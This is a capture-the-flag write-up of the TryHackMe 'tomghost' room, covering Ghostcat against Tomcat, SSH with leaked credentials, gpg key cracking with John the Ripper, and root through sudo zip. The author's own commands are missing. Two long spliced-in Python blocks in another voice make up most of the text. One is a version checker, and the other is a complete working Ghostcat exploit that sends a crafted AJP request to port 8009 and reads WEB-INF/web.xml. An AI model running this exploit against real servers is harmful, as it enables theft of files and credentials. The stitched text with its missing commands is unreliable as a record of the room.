tomghost
I have to find out what is on the server. For this, we can use an nmap scan with the following command:
We then read the nmap file to see what the server has on it:
We can see that there are four open ports. Since there is no port 80 (the regular HTTP port), we have to look at the other ports to see if any of these services is serving a website. Port 8080 had this on the site:
We now know that the server is running Apache Tomcat 9.0.30. I will try to use msfconsole (Metasploit) in order to find out if there is a vulnerability against this. Searching on exploit-db.com led me to this:
At this point, I am thinking that "Ghostcat" might be my way in. I then used searchsploit in order to see which exploits relating to this are already on my ParrotOS:
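Before reaching for an exploit, it is worth confirming from the scan alone that the two Ghostcat preconditions hold: an AJP connector reachable on the network and a Tomcat older than the fixed releases (Ghostcat is CVE-2020-1938; the Tomcat advisory lists 7.0.100, 8.5.51 and 9.0.31 as the first fixed versions, so 9.0.30 is in range). The following is an added example written for this page, not the author's script and not the room's scan output: a small parser for `nmap -sV -oN` output plus that version check. The embedded scan text is constructed to resemble a typical Tomcat host and the address 10.10.10.10 is hypothetical.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample of `nmap -sV -oN` output for a Tomcat host. The address is
# hypothetical and these lines are not the page's own scan results.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.10
Host is up (0.12s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 9.0.30
"""


class Port(NamedTuple):
    number: int
    proto: str
    service: str
    version: str


PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# First fixed release per branch from the Ghostcat (CVE-2020-1938) advisory;
# Tomcat 6 was end-of-life and never received a fix.
GHOSTCAT_FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}


def parse_open_ports(text: str) -> List[Port]:
    """Pull the open-port lines out of normal (-oN) nmap output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return ports


def tomcat_version(ports: List[Port]) -> Optional[Tuple[int, int, int]]:
    """Version triple from the first service banner that names Apache Tomcat."""
    for p in ports:
        m = re.search(r"Apache Tomcat (\d+)\.(\d+)\.(\d+)", p.version)
        if m:
            return tuple(int(x) for x in m.groups())
    return None


def ghostcat_candidate(ports: List[Port]) -> bool:
    """True when an AJP connector is exposed and the Tomcat version is below the fix."""
    if not any(p.service == "ajp13" for p in ports):
        return False          # nothing to talk AJP to
    ver = tomcat_version(ports)
    if ver is None:
        return False          # version unknown: go and fingerprint it first
    if ver[0] < 7:
        return True           # 6.x and older: no fixed release exists
    fixed = GHOSTCAT_FIXED.get(ver[0])
    return fixed is not None and ver < fixed
```

The check is deliberately conservative: a banner without a version, or a major branch outside the advisory table, returns False so that the exploit attempt is a decision rather than a reflex.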
I will then copy this file to my local directory so I can use it for the exploit:
I did get lost here because I had found the right exploit, but it was not working for some reason. I had to search online at this point, and came upon this website, where I saw they were using a command similar to mine with only one change: they were using the "python2.7" command instead of the regular "python" command. I entered the following:
The output to the command was the following:
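What the exploit actually sends is a single AJP13 Forward Request in which the `javax.servlet.include.*` request attributes are set by the client; Tomcat's DefaultServlet honours them and serves the named file from the webapp directory, which is how `WEB-INF/web.xml` (and the credentials the author found) come back. The following is an added example for this page, not the exploit-db script the author ran and not the room's traffic: it builds that request, parses the container's reply, and includes a constructed sample reply so the parser can be exercised offline. The AJP port 8009, the address in the usage comment and the toy web.xml are assumptions, not taken from the page.

```python
import socket
import struct
from typing import Dict, Optional, Tuple

AJP_MAGIC_REQ, AJP_MAGIC_RESP = b"\x12\x34", b"AB"   # client->container, container->client
JK_FORWARD_REQUEST, JK_METHOD_GET, JK_REQ_ATTRIBUTE = 2, 2, 0x0A
JK_SEND_BODY_CHUNK, JK_SEND_HEADERS, JK_END_RESPONSE = 3, 4, 5
# Response header names Tomcat sends as 2-byte codes rather than strings
RESP_HEADER_CODES = {
    0xA001: "Content-Type", 0xA002: "Content-Language", 0xA003: "Content-Length",
    0xA004: "Date", 0xA005: "Last-Modified", 0xA006: "Location", 0xA007: "Set-Cookie",
    0xA008: "Set-Cookie2", 0xA009: "Servlet-Engine", 0xA00A: "Status", 0xA00B: "WWW-Authenticate",
}


def ajp_string(s: Optional[str]) -> bytes:
    """AJP string: 2-byte big-endian length, the bytes, a NUL; None is the null string 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def build_ghostcat_request(path: str, server_name: str = "localhost", server_port: int = 8080) -> bytes:
    """Forward Request whose include attributes make the DefaultServlet read `path`
    relative to the webapp root (e.g. WEB-INF/web.xml)."""
    body = bytes([JK_FORWARD_REQUEST, JK_METHOD_GET]) + ajp_string("HTTP/1.1")
    body += ajp_string("/")                              # request URI: anything the default servlet handles
    body += ajp_string("127.0.0.1") + ajp_string(None)   # remote_addr, remote_host (null)
    body += ajp_string(server_name) + struct.pack(">H", server_port) + b"\x00"  # server, port, is_ssl
    body += struct.pack(">H", 0)                         # no request headers
    for name, value in (("javax.servlet.include.request_uri", "/"),
                        ("javax.servlet.include.path_info", path),
                        ("javax.servlet.include.servlet_path", "/")):
        body += bytes([JK_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += b"\xff"                                      # end of attributes
    return AJP_MAGIC_REQ + struct.pack(">H", len(body)) + body


def _read_string(buf: bytes, pos: int) -> Tuple[Optional[str], int]:
    n = struct.unpack_from(">H", buf, pos)[0]
    if n == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + n].decode(errors="replace"), pos + 3 + n   # +1 skips the NUL


def parse_ajp_response(data: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Walk SEND_HEADERS / SEND_BODY_CHUNK / END_RESPONSE messages into (status, headers, body)."""
    status, headers, body, pos = 0, {}, b"", 0
    while pos < len(data):
        if data[pos:pos + 2] != AJP_MAGIC_RESP:
            raise ValueError(f"bad response magic at offset {pos}")
        length = struct.unpack_from(">H", data, pos + 2)[0]
        msg, pos = data[pos + 4:pos + 4 + length], pos + 4 + length
        if msg[0] == JK_SEND_HEADERS:
            status = struct.unpack_from(">H", msg, 1)[0]
            _, p = _read_string(msg, 3)                  # status message, e.g. "OK"
            count, p = struct.unpack_from(">H", msg, p)[0], p + 2
            for _ in range(count):
                code = struct.unpack_from(">H", msg, p)[0]
                if code in RESP_HEADER_CODES:
                    name, p = RESP_HEADER_CODES[code], p + 2
                else:
                    name, p = _read_string(msg, p)
                value, p = _read_string(msg, p)
                headers[name] = value
        elif msg[0] == JK_SEND_BODY_CHUNK:
            body += msg[3:3 + struct.unpack_from(">H", msg, 1)[0]]   # length-prefixed, NUL-padded
        elif msg[0] == JK_END_RESPONSE:
            break
        else:
            raise ValueError(f"unexpected AJP message type {msg[0]}")
    return status, headers, body


def sample_response() -> bytes:
    """Constructed container reply (not a capture from any real host): 200 OK with one
    coded header, one body chunk holding a toy web.xml, then END_RESPONSE."""
    web_xml = b"<web-app><display-name>demo</display-name></web-app>"
    msgs = [
        bytes([JK_SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK")
        + struct.pack(">H", 1) + struct.pack(">H", 0xA001) + ajp_string("application/xml"),
        bytes([JK_SEND_BODY_CHUNK]) + struct.pack(">H", len(web_xml)) + web_xml + b"\x00",
        bytes([JK_END_RESPONSE, 1]),
    ]
    return b"".join(AJP_MAGIC_RESP + struct.pack(">H", len(m)) + m for m in msgs)


def fetch(host: str, path: str, port: int = 8009, timeout: float = 5.0):
    """Send the request to a live AJP connector, e.g. fetch("10.10.10.10", "WEB-INF/web.xml")
    with a hypothetical address. Tomcat keeps the connection open after END_RESPONSE
    (reuse flag set), so stop on that message or on timeout rather than waiting for EOF."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_ghostcat_request(path, server_name=host))
        try:
            while not data.endswith((b"AB\x00\x02\x05\x01", b"AB\x00\x02\x05\x00")):
                chunk = sock.recv(4096)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass
    return parse_ajp_response(data)
```

The request is plain Python 3, which sidesteps the python-versus-python2.7 confusion the author hit: the exploit-db script was written for Python 2 and breaks on Python 3's bytes/str distinction, which is exactly what the explicit `bytes` handling above avoids.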
After this, I saved the username and password. I had to work out where the username and password would fit. Turns out, they work for SSH:
There were two files in this directory: credential.pgp and tryhackme.asc. Neither of them looked as interesting as I thought they would. Looking around, I found the home folder of a different user, and in their directory I found the user.txt file.
I realized that to switch my user access to merlin (or even to root), I had to do something with the files in the skyfuck directory. I downloaded them using scp:
I ran into more trouble here as well. While trying to import tryhackme.asc with gpg, it asked me for a password, which I did not have. I had to refer back to the previous website to see how else I could attack this problem. Based on the website, my next step was to use John the Ripper to crack the asc file. Prior to doing that, I had to convert it into a format that John can read. This is where the programs in /opt/john/ come into play: they convert files of various types into a John-crackable format. We will use "gpg2john.py".
Running john on it led me to a password:
I then used the commands on this website in order to decrypt the files using the password from the john command.
From there, I got into merlin's account using that password. I ran "sudo -l" to see which commands the user merlin is able to run with sudo.
We can see that merlin is able to run the "zip" command with sudo. I have not used this command before, so I will have to research how we can get root using it. I went to the GTFOBins website to see how I could get root on this machine. I ran the following commands:
After this, I had a root shell. I was then able to read the contents of /root/root.txt.
I had now gotten the password and had completed the room. Overall, it was a great room. I did get lost a couple of times, but I think that's part of the learning process.